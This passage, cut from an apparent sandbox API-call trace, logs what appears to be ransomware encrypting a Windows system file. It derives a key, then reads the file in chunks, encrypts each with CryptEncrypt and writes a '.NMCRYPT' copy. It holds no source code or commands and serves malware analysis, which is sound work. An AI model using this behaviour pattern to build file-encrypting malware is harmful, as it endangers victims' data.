out: pbBuffer=0x2d7e150) returned 1 [0160.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.135] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.135] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.135] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.135] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.135] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.135] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.135] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.135] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.135] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.135] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.135] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.135] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.135] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0160.135] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0160.135] CryptCreateHash (in: hProv=0x8e3bb0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447dc | out: phHash=0x1d4447dc) returned 1 [0160.135] CryptHashData (hHash=0x9ad678, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0160.135] CryptDeriveKey (in: hProv=0x8e3bb0, Algid=0x6610, hBaseData=0x9ad678, dwFlags=0x4, phKey=0x1d4447e0 | out: phKey=0x1d4447e0*=0x9ad378) returned 1 [0160.136] CryptSetKeyParam (hKey=0x9ad378, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0160.136] CryptSetKeyParam (hKey=0x9ad378, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0160.136] wcslen (_String="\\\\?\\") returned 0x4 [0160.136] CryptDuplicateKey (in: hKey=0x9ad378, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad138) returned 1 [0160.136] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\tipresx.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-pt\\tipresx.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0160.136] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-pt\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0160.136] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=8704) returned 1 [0160.137] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0160.137] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.138] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.138] GetLastError () returned 0x0 [0160.138] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.139] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.139] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.139] GetLastError () returned 0x0 [0160.139] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.139] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.140] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.140] GetLastError () returned 0x0 [0160.140] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.140] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.140] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.140] GetLastError () returned 0x0 [0160.140] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.140] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.140] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.140] GetLastError () returned 0x0 [0160.140] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.140] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.140] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.140] GetLastError () returned 0x0 [0160.140] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.140] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.140] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.140] GetLastError () returned 0x0 [0160.140] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.140] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.140] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.140] GetLastError () returned 0x0 [0160.140] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.140] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.140] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.141] GetLastError () returned 0x0 [0160.141] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.141] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.141] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.141] GetLastError () returned 0x0 [0160.141] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.141] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.141] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.141] GetLastError () returned 0x0 [0160.141] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.141] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.141] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.141] GetLastError () returned 0x0 [0160.141] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.141] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.141] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.141] GetLastError () returned 0x0 [0160.141] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.141] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.141] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.141] GetLastError () returned 0x0 [0160.141] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.141] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.141] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.141] GetLastError () returned 0x0 [0160.141] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.142] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.142] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.142] GetLastError () returned 0x0 [0160.142] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.142] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.142] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.142] GetLastError () returned 0x0 [0160.142] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.142] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.142] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.142] GetLastError () returned 0x0 [0160.142] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.142] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.142] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.142] GetLastError () returned 0x0 [0160.142] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.142] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.142] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.142] GetLastError () returned 0x0 [0160.142] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.142] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.142] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.142] GetLastError () returned 0x0 [0160.142] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.143] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.143] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.143] GetLastError () returned 0x0 [0160.143] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.143] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.143] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.143] GetLastError () returned 0x0 [0160.143] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.143] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.143] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.143] GetLastError () returned 0x0 [0160.143] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.143] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.143] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.143] GetLastError () returned 0x0 [0160.143] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.143] 